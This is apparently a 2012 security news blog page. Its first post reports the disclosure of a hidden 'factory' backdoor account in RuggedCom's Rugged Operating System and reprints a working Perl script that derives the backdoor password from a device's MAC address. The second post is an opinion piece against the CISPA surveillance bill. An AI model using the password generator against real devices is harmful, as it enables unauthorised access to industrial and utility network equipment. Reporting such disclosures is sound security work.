Your security, networking, programming, and application news source.
Google

Tuesday, April 24, 2012

RuggedCom Unresponsive, Rugged Operating System (ROS®) Backdoor Disclosed

A factory backdoor account in RuggedCom's Rugged Operating System (ROS®) has been disclosed. <RuggedCom> is a manufacturer of rugged networking equipment popular in industrial, utility, and defense industries. These sensitive consumers of frequently security sensitive networking devices have recently been informed by RuggedCom, who has acknowledged the backdoor. Due somewhat to RuggedCom's unresponsiveness after acknowledgement, this information was publicly disclosed. According to the disclosure, an undocumented account, "factory", which cannot be disabled, is included in all released versions of ROS® with a password generated from the device's MAC address.

<Secunia - Full Disclosure CVE-2012-1803 (April 23, 2012)>

#!/usr/bin/perl
if (! defined $ARGV[0]) {
print "+========================================== \n";
print "+ RuggedCom ROS Backdoor Password Generator \n";
print "+ JC CREW April 23 2012 \n";
print "+ Usage:\n$0 macaddress \n";
print "+========================================== \n";
exit; }
$a = $ARGV[0];
$a =~  s/[^A-F0-9]+//simg;
@b = reverse split /(\S{2})/,$a;
$c = join "", @b;
$c .= "0000";
$d = hex($c) % 999999929;
print "$d\n";

Sunday, April 22, 2012

CISPA - US Internet Survalience Bill

Customers voice their opinion to supporters of the newest dangerous Internet bill, CISPA (H.R. 3523).



Cyber Intelligence Sharing and Protection Act (CISPA), also known as H.R. 3523, is not just another horribly irresponsible SOPA / PIPA. This bill focuses on a real issue, but does it the most horrible and irresponsible way possible.

CISPA is meant to lay the foundation for private companies and Internet service providers to share information with the US Government about cyber security threats. The main problems are the lack of any real definition to what a threat is, the bypassing of all existing laws to protect collection and sharing of your personal data by private companies, the lack of restriction of what information can be shared and with who, the warrant-less unrestricted sharing of data with the NSA, DHS, and other government agencies, and encouragement of heavy broad surveillance of citizens.

This bill will directly encourage private companies such as your cellular carrier (Verizon / AT&T), your operating system (Microsoft), your anti virus scanner (Symantec), and your Internet service provider (ISP) to collect huge amounts of your personal data to a level that would previously be illegal. This CISPA authority would override privacy protection laws (such as protecting of your medical records), local eavesdropping and wiretapping laws, and allow collection of almost any data based on recklessly vague "cybersecurity" purposes. This private companies would be able to collect this data anonymously without ever having to tell you they collected it or what they collected. They would be free to share the data with any company they want, possibly even selling the data, with complete immunity to legal actions such as lawsuits of criminal charges for privacy violations. They would be allowed to dump all this data on any US Government agency without requiring a warrant.

This is at the wake of the NSA beginning building the country's biggest spy center in Utah. As well as a recent NSA whistle-blower's claim that the US Government has illegally been engaged in wide spread Internet surveillance for quite some time having intercepted 20 Trillion communications and has copies of "most of your Emails". Again, illegally and therefor with no oversight, I might add.

CISPA (H.R. 3523) is another horrible dangerous and irresponsible bill that will erode all existing personal data and privacy protection laws, and give ALL your data to private companies to use and abuse under the table with complete immunity from legal repercussions.

Verizon disgustingly supports this bill. We call on you, Verizon, to change your stance away from this strong-arm theft and abuse of citizens personal data!

Verizon's letter of support for CISPA:
http://intelligence.house.gov/sites/intelligence.house.gov/files/documents/Verizon113011.pdf


More Information:

Electronic Freedom Foundation:
http://cyberspying.eff.org/

TIME Magazine:
http://techland.time.com/2012/04/19/5-reasons-the-cispa-cybersecurity-bill-should-be-tossed/



Source: Verizon Wireless Community Forum
April 22, 2012 12:00PM
(The original text has been modified for formatting, linking, and alignment.)

Some other supporters:
  • AT&T
  • Boeing
  • BSA
  • Business Roundtable
  • CSC
  • COMPTEL
  • CTIA - The Wireless Association
  • Cyber, Space & Intelligence Association
  • Edison Electric
  • EMC
  • Exelon
  • Facebook
  • The Financial Services Roundtable
  • IBM
  • Independent Telephone & Telecommunications Alliance
  • Information Technology Industry Council
  • Intel
  • Internet Security Alliance
  • Lockheed Martin
  • Microsoft
  • National Cable & Telecommunications Association
  • NDIA
  • Oracle
  • Symantec
  • TechAmerica
  • US Chamber of Commerce
  • US Telecom - The Broadband Association
  • Verizon